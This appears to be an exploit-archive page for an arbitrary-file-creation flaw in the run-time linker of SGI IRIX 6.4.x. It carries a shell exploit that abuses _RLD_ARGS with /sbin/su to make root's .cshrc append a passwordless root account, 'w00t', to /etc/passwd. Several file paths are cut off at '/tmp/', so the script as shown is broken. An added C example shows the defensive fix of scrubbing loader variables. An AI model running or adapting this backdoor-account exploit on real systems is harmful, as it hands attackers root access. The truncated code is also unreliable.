SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

Exploit for an arbitrary file creation flaw in the run-time linker (rld) of SGI IRIX versions 6.4.x and below.

MD5 | 22c4dd3bf38e8b2ac6db4f303c2664fb

# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit
# =======================================================================
# The IRIX run-time linker on all versions prior to 6.5 does not properly
# scrub environment variables when executing binaries with privilege or
# capabilities. A malicious user can leverage this to create files as the
# "root" user and partially control the contents.
# -- HackerFantastic (
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/
chmod 755 /tmp/
_RLD_ARGS="-log /.cshrc |/tmp/" /sbin/su
last -3 root
echo "[ waiting 5mins for root to login..."
sleep 300
su - w00t
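
The scrubbing step that the header comment says rld omits for privileged binaries, as an added example (not code from the original page or from IRIX). The function name, the "LD_" prefix and the sample environment are assumptions made for illustration.

```c
/* Added example: drop run-time linker variables from an environment array. */
#include <stdio.h>
#include <string.h>

/* Name prefixes treated as loader controls. "_RLD" covers the _RLD_ARGS
 * variable used on this page; "LD_" is an assumed addition for the usual
 * library search-path variables. */
static const char *const BLOCKED_PREFIXES[] = { "_RLD", "LD_" };

/* Return 1 if the "NAME=value" entry has a blocked name prefix. */
static int is_loader_var(const char *entry)
{
    size_t i;
    for (i = 0; i < sizeof BLOCKED_PREFIXES / sizeof BLOCKED_PREFIXES[0]; i++) {
        size_t n = strlen(BLOCKED_PREFIXES[i]);
        if (strncmp(entry, BLOCKED_PREFIXES[i], n) == 0)
            return 1;
    }
    return 0;
}

/* Compact a NULL-terminated environment array in place, dropping every
 * loader-control entry (duplicates included). Returns the number dropped. */
size_t scrub_loader_env(char **envp)
{
    char **src, **dst = envp;
    size_t dropped = 0;
    for (src = envp; *src != NULL; src++) {
        if (is_loader_var(*src))
            dropped++;
        else
            *dst++ = *src;
    }
    *dst = NULL;
    return dropped;
}

int main(void)
{
    /* Constructed sample environment, not taken from a real system. */
    char *env[] = { "_RLD_ARGS=-log /tmp/constructed.log", "PATH=/usr/bin",
                    "LD_LIBRARY_PATH=/tmp/lib", "_RLDN32_LIST=x", "HOME=/", NULL };
    size_t i, n = scrub_loader_env(env);
    printf("dropped %lu entries\n", (unsigned long)n);
    for (i = 0; env[i] != NULL; i++)
        printf("kept: %s\n", env[i]);
    return 0;
}
```

A privileged program that starts other programs would pass the scrubbed array to execve(); the linker-side equivalent is to ignore these variables whenever the real and effective IDs differ.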
